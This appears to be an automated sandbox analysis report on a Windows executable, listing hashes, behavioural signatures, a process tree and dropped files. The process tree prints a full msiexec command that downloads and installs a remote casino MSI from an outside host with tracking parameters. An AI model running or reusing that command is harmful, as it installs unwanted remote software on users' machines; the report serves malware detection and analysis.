640dbf907242b2747b9bc074fca62605599999ef0d998ef9a63e7ed4fae0df04

Analysis

max time kernel
148s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
24/12/2023, 21:59

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

143392d2f6415b52af9981f33dca9d9c.exe
Size

1.4MB
MD5

143392d2f6415b52af9981f33dca9d9c
SHA1

49fbbc77478ef8f9767e0a88e8f64820441cf8ce
SHA256

640dbf907242b2747b9bc074fca62605599999ef0d998ef9a63e7ed4fae0df04
SHA512

1ca090203904d3aa707877d38378025bea899ee942e28c6589c330eacfc9c39483c8e894a885968f41240a443f2f9468f8ba773a609930bc1c4adaf58c8952af
SSDEEP

24576:7nn/S5jES90h1XFRxoODggKWhV77ln0XhPDZf0NzHF6SZpDl1CJVDDO:jS9ES90h1X8HaN5+PDtcRXVcVDK

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
448	9otKrD.exe

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
2588	MSIEXEC.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2588	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	2588	MSIEXEC.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2588	MSIEXEC.EXE
2588	MSIEXEC.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2308 wrote to memory of 448	2308	143392d2f6415b52af9981f33dca9d9c.exe	25
PID 2308 wrote to memory of 448	2308	143392d2f6415b52af9981f33dca9d9c.exe	25
PID 2308 wrote to memory of 448	2308	143392d2f6415b52af9981f33dca9d9c.exe	25
PID 448 wrote to memory of 2588	448	9otKrD.exe	95
PID 448 wrote to memory of 2588	448	9otKrD.exe	95
PID 448 wrote to memory of 2588	448	9otKrD.exe	95

C:\Users\Admin\AppData\Local\Temp\143392d2f6415b52af9981f33dca9d9c.exe
"C:\Users\Admin\AppData\Local\Temp\143392d2f6415b52af9981f33dca9d9c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2308
- C:\Users\Admin\AppData\Local\Temp\9otKrD.exe
  "C:\Users\Admin\AppData\Local\Temp\9otKrD.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:448
- - C:\Windows\SysWOW64\MSIEXEC.EXE
    MSIEXEC.EXE /i "http://setup.dnfilescntnt.eu/36175/cdn/goldvipclub/Gold VIP Club Casino20120417101254.msi" DDC_DID=3718134 DDC_RTGURL=http://178.248.234.5/dl/TrackSetup/TrackSetup.aspx?DID=3718134%26CASINONAME=goldvipclub DDC_DOWNLOAD_AFFID=277 CUSTOMNAME02=redirectAsData CUSTOMVALUE02=1 CUSTOMNAME03=remoteIP CUSTOMVALUE03=209.200.157.73 CUSTOMNAME04=name CUSTOMNAME05=email CUSTOMNAME06=redirect CUSTOMNAME07=version CUSTOMVALUE07=100 CUSTOMNAME08=camefrom CUSTOMNAME09=adid CUSTOMVALUE09=NULL CUSTOMNAME10=affreferrer SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="9otKrD.exe"
    3⤵
    - Use of msiexec (install) with remote resource
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2588

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9otKrD.exe

Filesize
149KB

MD5
54a5bd5c74faf274106085377760bac7

SHA1
7a7bd4fe58ea41f6aea2b28fdf43ae16a193ae36

SHA256
ec915c712af2f3ee4ad8603cf4951d6c28898f956cb2ac2548b303ced3f96b78

SHA512
29bbee5c778c782d52cec714da5f8b0a30c72c9040a06af8583980d56f65e8bd069ded47c82b5276dcbfe503abdc334a63b2f5d56369f6d538380060c9a2a82f

Download Submit
C:\Users\Admin\AppData\Local\Temp\9otKrD.exe

Filesize
103KB

MD5
21279d93e57f20e18f79eff7fb369ce2

SHA1
619e7dd4df439996895424ad755222a6470d5c4a

SHA256
e25adb887608ee58f5e35361c16201c3ce071a9338de477de5910ff8044ebae6

SHA512
e95b5b71acd6fd15ed460ecea09d2b1ae2c75027cfb100f8377e2cd3c44ff124b78c171763f6bdcb859dabcec55c1697944b408f23ae90043c0089a71c998784

Download Submit
C:\Users\Admin\AppData\Local\Temp\_is43E4.tmp

Filesize
1KB

MD5
825f9cd395bd88344cafd1581ac2abc7

SHA1
ea403d129e4b24b4ede327015c8e3d01010ac27d

SHA256
6efc809e9ef7067b119f179856291988a17f8d46a71c931f9ddc539e1e0e8a69

SHA512
734867fda441a538d0b1a16b3758f5eff70e2a2778db993497881de64228b105dd2470b0324fb290a2a2ce5638cfb5c701e4135144e1056a49c8054fa93bb3b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\{F2B9FAF7-A189-48A6-AB23-9E00C4A90B1F}\0x0409.ini

Filesize
21KB

MD5
be345d0260ae12c5f2f337b17e07c217

SHA1
0976ba0982fe34f1c35a0974f6178e15c238ed7b

SHA256
e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

SHA512
77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\{F2B9FAF7-A189-48A6-AB23-9E00C4A90B1F}\_ISMSIDEL.INI

Filesize
20B

MD5
db9af7503f195df96593ac42d5519075

SHA1
1b487531bad10f77750b8a50aca48593379e5f56

SHA256
0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

SHA512
6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~43D1.tmp

Filesize
6KB

MD5
f6c4f8155d49345915779e6acd587927

SHA1
2d9137011bfdfc7c93bc5c459fcd6aa6feaa07a6

SHA256
2a27fa4f649c3b38f49f84a9384ee4e0d27427fa25875c5f000eb711051f89eb

SHA512
a5807bc00923319cc3517a2a68b95d65e2ed0eb80ccbe0cc1973213351d2a8377ce93e2054f6bfc63f1f3b125d8ad4d369f46c7539ed3c1a8ae51fbce27f9bec

Download Submit